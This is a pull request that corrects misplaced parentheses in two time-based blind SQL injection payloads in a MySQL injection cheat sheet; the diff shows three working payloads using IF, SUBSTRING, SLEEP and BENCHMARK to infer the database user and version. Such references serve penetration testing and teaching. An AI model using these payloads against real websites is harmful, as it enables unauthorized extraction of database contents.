### PR TITLE
Fix extra parentheses in MySQL Injection.md

### DIFF
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -432,8 +432,8 @@ Extracting column_name.
 ### Using Conditional Statements
 
 ```sql
-?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
-?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --
+?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1, BENCHMARK(2000000,MD5(NOW()))) --
+?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1))>=100, 1, SLEEP(3)) --
 ?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 ```
 


### PR DESCRIPTION
Removed extra parentheses in the “Using Conditional Statements” section of MySQL Injection.md.